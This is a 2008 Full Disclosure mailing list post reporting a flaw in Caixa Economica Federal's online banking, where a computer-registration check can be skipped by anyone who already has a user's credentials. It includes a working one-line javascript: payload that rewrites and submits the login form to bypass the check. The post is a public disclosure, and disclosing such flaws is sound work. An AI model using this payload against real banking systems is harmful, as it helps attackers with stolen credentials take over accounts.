Home page logo
/

fulldisclosure logo Full Disclosure mailing list archives

Brazilian Bank (Caixa Economica Federal) vuln
From: "H2G-Labs Information Security" <h2glabs.infosec () gmail com>
Date: Thu, 19 Jun 2008 10:43:08 -0300

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA512

Hi folks,
some brazilian banks has implementing a system based in computer
identification (like a PC register).

The system have some vulns and can be easily exploited.

I am trying to contact the Caixa Economica Federal
(http://www.caixa.gov.br) without success.

If the attacker have the USERNAME and the PASSWORD of the user
account, the attacker can log in on the bank account without identify
the computer.

To this, after enter the USERNAME and PASSWORD of account, pute the
code in browser (in agree terms page):
javascript:document.forms[0].onsubmit='';document.forms[0].navegacao.value='16';document.forms[0].submit();void(0);

And you will be logged in, without need register/identify you machine.

I hope the CAIXA team solve this problem hurry.

Sorry to my bad english, I am brazilian.

Regards...

- --
H2G-Labs Information Security
Igor Marcel - Information Security Consultant
H2GLabs.InfoSec "at" Gmail.com

-----BEGIN PGP SIGNATURE-----
Version: GnuPG (PRIVATE)
Comment: H2G-Labs Information Security

iQIVAwUBSFpijMJBTfehHgWwAQp0ZBAAjpHW3keLOAuPvF91Jb8JSktRWgRy+q5p
PnhuiDXMaflWSUSVWQic24BStRYGv3RXCK8OKQdVMhVwcfG8LIFBWndYopwKUDx3
esGjTMZBuwoGnT3kIOjpFsygucGY89rNePfNduoJDY8NGeQCWe04TbzkeR1xUliT
LHqd3rpsgvd6p7jQu9/Ai1+1BDAi9p34toAxGm5RzfXNzr69DT6Jkuq8mSfGnPiZ
+roQEXI/6JQNoZhhWKYCGlwzXVFyQUCZVQ7IgcqjL+0RtsmhkGpw2VlG4enIY4UZ
eqo1eqZdsFmooHnMgDnorR8OQQrq+/20JbFy3pVBoOfh/9HPntFYZnBJVTRqGGKL
Tt9LzlQz5eMpLE2c74nz0b5FeSOLFoKyT/eyzX0R5yfLiVH7BKaa4egejjZcjXwh
Vtv6L0BL67iAmL7iTQiJ9EjOY2PFKmSsdwpEOv8iCbzk6rK0p0JKKBjrRN1OT4e2
02yVvzglDoLJymPwHtuQDudwPnJ1lTJE3+5gK0pUWfWxhqe/Rq7u6J4f1Cs7N05r
aSaSQFlklarsi7xs3IQPlICejMq0dEcGlmnsXbD9XGurSt9KBeRO55wkAaA5p7T7
ncyEsfEidFEl5fQstVuuvG9Gf+94Q64Skluq8+e6awJXc1nf1xT0O4hJErQhzg4u
HVP+cm14G8A=
=wJAX
-----END PGP SIGNATURE-----

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


  By Date           By Thread  

Current thread:
[ Nmap | Sec Tools | Mailing Lists | Site News | About/Contact | Advertising | Privacy ]
AlienVault